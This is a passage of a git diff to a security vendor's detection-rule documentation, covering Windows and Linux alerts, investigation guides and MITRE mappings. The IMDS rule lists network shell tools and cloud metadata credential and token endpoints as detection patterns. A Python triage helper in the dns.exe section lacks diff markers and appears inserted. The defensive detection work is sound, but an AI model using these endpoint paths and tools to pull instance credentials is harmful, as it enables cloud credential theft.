"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" + process.executable: C\:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\service-*\\exec\\PDQInventoryScanner.exe and + process.code_signature.subject_name:"PDQ.com Corporation" and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\Windows\\Temp\\\{*\}\\_is*.exe and + process.code_signature.subject_name:("Dell Technologies Inc." or "Dell Inc" or "Dell Inc.") and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\ProgramData\\chocolatey\\* and + process.code_signature.subject_name:("Chocolatey Software, Inc." or "Chocolatey Software, Inc") and + process.code_signature.trusted:true + ) and + not process.executable : ( + "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or + "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" + ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-seincreasebasepriorityprivilege-use.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-seincreasebasepriorityprivilege-use.asciidoc new file mode 100644 index 0000000000..9db1c3067f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-seincreasebasepriorityprivilege-use.asciidoc @@ -0,0 +1,126 @@ +[[suspicious-seincreasebasepriorityprivilege-use]] +=== Suspicious SeIncreaseBasePriorityPrivilege Use + +Identifies attempts to use the SeIncreaseBasePriorityPrivilege privilege by an unusual process. This could be related to hijacking the execution flow of a process via thread priority manipulation.
+ +*Rule type*: query + +*Rule indices*: + +* logs-system.security* +* logs-windows.forwarded* +* winlogbeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/Octoberfest7/ThreadCPUAssignment_POC/tree/main +* https://x.com/sixtyvividtails/status/1970721197617717483 +* https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4674 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious SeIncreaseBasePriorityPrivilege Use* + + +SeIncreaseBasePriorityPrivilege allows a process to raise the scheduling priority of processes running on the system, so that the CPU scheduler lets them pre-empt lower-priority processes whenever they have work to do. + + +*Possible investigation steps* + + +- Review the reputation of process.executable and its execution chain. +- Investigate whether the SubjectUserName is expected to perform this action. +- Correlate the event with other security alerts or logs to identify any patterns or additional suspicious activities that might suggest a broader attack campaign. +- Check the agent health status and verify whether there has been any tampering with endpoint security processes. + + +*False positive analysis* + + +- Administrative tasks involving legitimate CPU scheduling priority changes. + + +*Response and remediation* + + +- Immediately isolate the affected machine from the network to prevent further unauthorized access or lateral movement within the domain. +- Terminate the processes involved in the execution chain. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken. + +==== Setup + + + +*Setup* + + +Ensure advanced audit policies for Windows are enabled, specifically: +Audit Sensitive Privilege Use https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4674[Event ID 4674] (An operation was attempted on a privileged object.)
+ +``` +Computer Configuration > +Policies > +Windows Settings > +Security Settings > +Advanced Audit Policies Configuration > +Audit Policies > +Privilege Use > +Audit Sensitive Privilege Use (Success) +``` + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:iam and event.code:"4674" and +winlog.event_data.PrivilegeList:"SeIncreaseBasePriorityPrivilege" and event.outcome:"success" and +winlog.event_data.AccessMask:"512" and not winlog.event_data.SubjectUserSid:("S-1-5-18" or "S-1-5-19" or "S-1-5-20") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ diff --git a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-powershell-arguments.asciidoc b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-powershell-arguments.asciidoc index a8bfc097fe..a705cd458e 100644 --- a/docs/detections/prebuilt-rules/rule-details/suspicious-windows-powershell-arguments.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/suspicious-windows-powershell-arguments.asciidoc @@ -44,7 +44,7 @@ Identifies the execution of PowerShell with suspicious argument values. This beh * Data Source: Elastic Endgame * Resources: Investigation Guide -*Version*: 208 +*Version*: 209 *Rule authors*: @@ -111,7 +111,7 @@ process where host.os.type == "windows" and event.type == "start" and process.name : "powershell.exe" and not ( - user.id == "S-1-5-18" and + ?user.id == "S-1-5-18" and /* Don't apply the user.id exclusion to Sysmon for compatibility */ not event.dataset : ("windows.sysmon_operational", "windows.sysmon") ) and diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-file-operation-by-dns-exe.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-file-operation-by-dns-exe.asciidoc index 410d2995e8..2499a0954e 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-file-operation-by-dns-exe.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-file-operation-by-dns-exe.asciidoc @@ -38,8 +38,9 @@ Identifies an unexpected file being modified by dns.exe, the process responsible * Use Case: Vulnerability * Data Source: Elastic Defend * Data Source: Sysmon +* Resources: Investigation Guide -*Version*: 215 +*Version*: 216 *Rule authors*: @@ -48,6 +49,51 @@ Identifies an unexpected file being modified by dns.exe, the process responsible *Rule license*: Elastic License v2 +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual File Operation by dns.exe* + + +The rule flags Windows DNS Server (dns.exe) creating, changing, or deleting files that aren’t typical DNS zone or log files, which signals exploitation for code execution or abuse to stage payloads for lateral movement. After gaining execution in dns.exe via DNS RPC or parsing bugs, attackers often write a malicious EXE into System32 and register a new service, leveraging the trusted service context on a domain controller to persist and pivot. 
+ + +*Possible investigation steps* + + +- Validate the modified file’s full path, type, and provenance, prioritizing writes in %SystemRoot%\System32, NETLOGON, or SYSVOL, and confirm signature, hash reputation, and compile timestamp to rapidly classify the artifact. +- Pivot to persistence telemetry around the same timestamp by hunting for new services or scheduled tasks (e.g., SCM 7045, Security 4697, TaskScheduler 106/200) and registry autoruns that reference the file. +- Correlate with DNS service network activity and logs for unusual RPC calls, authenticated connections from non-admin hosts, or spikes in failures/crashes that could indicate exploitation. +- Inspect the service’s runtime state for injection indicators by reviewing recent module loads, unsigned DLLs, suspicious memory sections, and ETW/Sysmon events mapping threads that performed the write. +- If the file is executable or a script or placed in execution-friendly locations, detonate it in a sandbox and scope the blast radius by pivoting on its hash, filename, and path across the fleet. + + +*False positive analysis* + + +- DNS debug logging configured to write to a file with a non-.log extension (e.g., .txt) causes dns.exe to legitimately create or rotate that file during troubleshooting. +- An administrator exports a zone to a custom-named file with a nonstandard extension (e.g., .txt or .xml), leading dns.exe to create or modify that file as part of routine maintenance. + + +*Response and remediation* + + +- Isolate the host by removing it from DNS rotation and restricting network access to management-only, then capture and quarantine any files dns.exe created or modified outside %SystemRoot%\System32\Dns or with executable extensions. +- Delete or quarantine suspicious artifacts written by dns.exe (e.g., .exe, .dll, .ps1, .js) in %SystemRoot%\System32, NETLOGON, or SYSVOL, record their hashes, and block them fleetwide via EDR or application control. +- Remove persistence by disabling and deleting any new or altered Windows services, scheduled tasks, or Run/Autorun registry entries that reference the dns.exe-written file path, and restore legitimate service ImagePath values. +- Recover by repairing system files with SFC/DISM, restoring affected directories from known-good backups, and restarting the DNS service, then validate zone integrity, AD replication, and client name-resolution. +- Immediately escalate to incident response if dns.exe wrote an executable or script into NETLOGON or SYSVOL or if a service binary path was changed to point to a newly dropped file, indicating probable domain controller compromise and lateral movement. +- Harden by applying the latest Windows Server DNS patches, enforcing WDAC/AppLocker to block execution from SYSVOL/NETLOGON and restrict dns.exe writes to the DNS and log directories, and enable auditing on service creation and file writes in System32/NETLOGON/SYSVOL. 
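As a companion to the triage steps above, the following is a small, hypothetical helper (not part of the rule) that classifies a file path flagged by this detection and computes its SHA-256 for reputation pivoting. The expected-directory list, the risky-extension set, and the sample path are assumptions to tune for your environment.

[source, python]
----------------------------------
"""Hypothetical triage helper for files written by dns.exe: path classification plus SHA-256."""
import hashlib
from pathlib import Path, PureWindowsPath

# Assumed-expected locations for DNS zone and debug log files; adjust to your environment.
EXPECTED_DIRS = [r"C:\Windows\System32\dns", r"C:\Windows\System32\dns\backup"]
RISKY_EXTENSIONS = {".exe", ".dll", ".ps1", ".js", ".bat", ".cmd"}

def classify(flagged_path: str) -> str:
    """Label a flagged path as suspicious or likely benign based on location and extension."""
    p = PureWindowsPath(flagged_path)
    in_expected = any(PureWindowsPath(d) in p.parents for d in EXPECTED_DIRS)
    if p.suffix.lower() in RISKY_EXTENSIONS:
        return "suspicious: executable/script extension"
    if not in_expected:
        return "suspicious: outside expected DNS directories"
    return "likely benign location (verify file type and recent config changes)"

def sha256_of(path: str) -> str:
    """Hash the file in chunks so large artifacts do not need to fit in memory."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as handle:
        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
            digest.update(chunk)
    return digest.hexdigest()

if __name__ == "__main__":
    sample = r"C:\Windows\System32\evil.exe"   # hypothetical path taken from the alert
    print(classify(sample))
    # print(sha256_of(sample))  # run on the affected host or against a collected copy
----------------------------------

The resulting hash can then be swept across EDR telemetry and sandbox results, as described in the final investigation step above.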
+ + ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-instance-metadata-service-imds-api-request.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-instance-metadata-service-imds-api-request.asciidoc index 8eea8c971c..9f5311f2c7 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-instance-metadata-service-imds-api-request.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-instance-metadata-service-imds-api-request.asciidoc @@ -23,10 +23,12 @@ This rule identifies potentially malicious processes attempting to access the cl *References*: * https://hackingthe.cloud/aws/general-knowledge/intro_metadata_service/ +* https://www.wiz.io/blog/imds-anomaly-hunting-zero-day *Tags*: * Domain: Endpoint +* Domain: Cloud * OS: Linux * Use Case: Threat Detection * Tactic: Credential Access @@ -34,7 +36,7 @@ This rule identifies potentially malicious processes attempting to access the cl * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -96,43 +98,112 @@ The Instance Metadata Service (IMDS) API provides essential instance-specific da [source, js] ---------------------------------- -sequence by host.id, process.parent.entity_id with maxspan=1s -[process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and - process.parent.executable != null and - ( - process.name : ( - "curl", "wget", "python*", "perl*", "php*", "ruby*", "lua*", "telnet", "pwsh", - "openssl", "nc", "ncat", "netcat", "awk", "gawk", "mawk", "nawk", "socat", "node" - ) or - process.executable : ( - "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", - "/etc/cron*", "/etc/update-motd.d/*", "/boot/*", "/srv/*", "/run/*", "/etc/rc.local" - ) or - process.command_line: "*169.254.169.254*" - ) - and not process.working_directory: ( - "/opt/rapid7*", - "/opt/nessus*", - "/snap/amazon-ssm-agent*", - "/var/snap/amazon-ssm-agent/*", - "/var/log/amazon/ssm/*", - "/srv/snp/docker/overlay2*", - "/opt/nessus_agent/var/nessus/*") - and not process.executable: ( - "/opt/rumble/bin/rumble-agent*", - "/opt/aws/inspector/bin/inspectorssmplugin", - "/snap/oracle-cloud-agent/*", - "/lusr/libexec/oracle-cloud-agent/*") - and not process.parent.executable: ( - "/usr/bin/setup-policy-routes", - "/usr/share/ec2-instance-connect/*", - "/var/lib/amazon/ssm/*", - "/etc/update-motd.d/30-banner", - "/usr/sbin/dhclient-script", - "/usr/local/bin/uwsgi", - "/usr/lib/skylight/al-extras") +sequence by host.id, process.parent.entity_id with maxspan=3s +[ + process + where host.os.type == "linux" + and event.type == "start" + and event.action == "exec" + and process.parent.executable != null + + // common tooling / suspicious names (keep broad) + and ( + process.name : ( + "curl", "wget", "python*", "perl*", "php*", "ruby*", "lua*", "telnet", "pwsh", + "openssl", "nc", "ncat", "netcat", "awk", "gawk", "mawk", "nawk", "socat", "node", + "bash", "sh" + ) + or + // suspicious execution locations (dropped binaries / temp execution) + process.executable : ( + "./*", "/tmp/*", "/var/tmp/*", "/var/www/*", "/dev/shm/*", "/etc/init.d/*", "/etc/rc*.d/*", + "/etc/cron*", "/etc/update-motd.d/*", "/boot/*", "/srv/*", "/run/*", "/etc/rc.local" + ) + or + // threat-relevant IMDS / metadata endpoints (inclusion list) + process.command_line : ( + "*169.254.169.254/latest/api/token*", + "*169.254.169.254/latest/meta-data/iam/security-credentials*", + 
"*169.254.169.254/latest/meta-data/local-ipv4*", + "*169.254.169.254/latest/meta-data/local-hostname*", + "*169.254.169.254/latest/meta-data/public-ipv4*", + "*169.254.169.254/latest/user-data*", + "*169.254.169.254/latest/dynamic/instance-identity/document*", + "*169.254.169.254/latest/meta-data/instance-id*", + "*169.254.169.254/latest/meta-data/public-keys*", + "*computeMetadata/v1/instance/service-accounts/*/token*", + "*/metadata/identity/oauth2/token*", + "*169.254.169.254/opc/v*/instance*", + "*169.254.169.254/opc/v*/vnics*" + ) + ) + + // global working-dir / executable / parent exclusions for known benign agents + and not process.working_directory : ( + "/opt/rapid7*", + "/opt/nessus*", + "/snap/amazon-ssm-agent*", + "/var/snap/amazon-ssm-agent/*", + "/var/log/amazon/ssm/*", + "/srv/snp/docker/overlay2*", + "/opt/nessus_agent/var/nessus/*" + ) + + and not process.executable : ( + "/opt/rumble/bin/rumble-agent*", + "/opt/aws/inspector/bin/inspectorssmplugin", + "/snap/oracle-cloud-agent/*", + "/lusr/libexec/oracle-cloud-agent/*" + ) + + and not process.parent.executable : ( + "/usr/bin/setup-policy-routes", + "/usr/share/ec2-instance-connect/*", + "/var/lib/amazon/ssm/*", + "/etc/update-motd.d/30-banner", + "/usr/sbin/dhclient-script", + "/usr/local/bin/uwsgi", + "/usr/lib/skylight/al-extras", + "/usr/bin/cloud-init", + "/usr/sbin/waagent", + "/usr/bin/google_osconfig_agent", + "/usr/bin/docker", + "/usr/bin/containerd-shim", + "/usr/bin/runc" + ) + + and not process.entry_leader.executable : ( + "/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent", + "/opt/Elastic/Agent/data/elastic-agent-*/elastic-agent", + "/opt/nessus_agent/sbin/nessus-service" + ) + + // carve-out: safe /usr/bin/curl usage (suppress noisy, legitimate agent patterns) + and not ( + process.executable == "/usr/bin/curl" + and ( + // AWS IMDSv2 token PUT that includes ttl header + (process.command_line : "*-X PUT*169.254.169.254/latest/api/token*" and process.command_line : "*X-aws-ec2-metadata-token-ttl-seconds*") + or + // Any IMDSv2 GET that includes token header for any /latest/* path + process.command_line : "*-H X-aws-ec2-metadata-token:*169.254.169.254/latest/*" + or + // Common amazon tooling UA + process.command_line : "*-A amazon-ec2-net-utils/*" + or + // Azure metadata legitimate header + process.command_line : "*-H Metadata:true*169.254.169.254/metadata/*" + or + // Oracle IMDS legitimate header + process.command_line : "*-H Authorization:*Oracle*169.254.169.254/opc/*" + ) + ) +] +[ + network where host.os.type == "linux" + and event.action == "connection_attempted" + and destination.ip == "169.254.169.254" ] -[network where host.os.type == "linux" and event.action == "connection_attempted" and destination.ip == "169.254.169.254"] ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-remote-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-remote-file-creation.asciidoc index ed13a90eba..5dea22a9b1 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-remote-file-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-remote-file-creation.asciidoc @@ -10,9 +10,9 @@ This rule leverages the new_terms rule type to detect file creation via a common * logs-endpoint.events.file* * auditbeat-* -*Severity*: medium +*Severity*: low -*Risk score*: 47 +*Risk score*: 21 *Runs every*: 5m @@ -31,7 +31,7 @@ This rule leverages the new_terms rule type to detect file creation via a common * Data Source: Elastic 
Defend * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -148,7 +148,15 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit ---------------------------------- event.category:file and host.os.type:linux and event.action:creation and process.name:(scp or ftp or sftp or vsftpd or sftp-server or sync) and -not file.path:(/dev/ptmx or /run/* or /var/run/*) +not ( + file.path:( + /dev/ptmx or /run/* or /var/run/* or /home/*/.ansible/*AnsiballZ_*.py or /home/*/.ansible/tmp/ansible-tmp* or + /root/.ansible/*AnsiballZ_*.py or /tmp/ansible-chief/ansible-tmp*AnsiballZ_*.py or + /tmp/newroot/home/*/.ansible/tmp/ansible-tmp*AnsiballZ_*.py or /tmp/.ansible/tmp/ansible-tmp*AnsiballZ_*.py or + /tmp/ansible-tmp-*/AnsiballZ_*.py or /tmp/.ansible/ansible-tmp-*AnsiballZ_*.py + ) or + file.extension:(filepart or yaml or new or rpm or deb) +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-application.asciidoc index f34e47a9ff..3b133ba1c2 100644 --- a/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-application.asciidoc @@ -7,8 +7,8 @@ Identifies when a user is added as an owner for an Azure application. An adversa *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when a user is added as an owner for an Azure application. An adversa *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,7 +30,7 @@ Identifies when a user is added as an owner for an Azure application. An adversa * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -111,3 +111,11 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to a ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-service-principal.asciidoc b/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-service-principal.asciidoc index e667e89ffa..4ae03047f6 100644 --- a/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-service-principal.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/user-added-as-owner-for-azure-service-principal.asciidoc @@ -7,8 +7,8 @@ Identifies when a user is added as an owner for an Azure service principal. The *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when a user is added as an owner for an Azure service principal. 
The *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when a user is added as an owner for an Azure service principal. The * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -113,3 +113,11 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to s ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/index.asciidoc b/docs/index.asciidoc index 6cf67e805a..afcaaf7cd5 100644 --- a/docs/index.asciidoc +++ b/docs/index.asciidoc @@ -97,3 +97,5 @@ include::detections/prebuilt-rules/downloadable-packages/8-19-5/prebuilt-rules-8 include::detections/prebuilt-rules/downloadable-packages/8-19-6/prebuilt-rules-8-19-6-appendix.asciidoc[] include::detections/prebuilt-rules/downloadable-packages/8-19-7/prebuilt-rules-8-19-7-appendix.asciidoc[] + +include::detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rules-8-19-8-appendix.asciidoc[]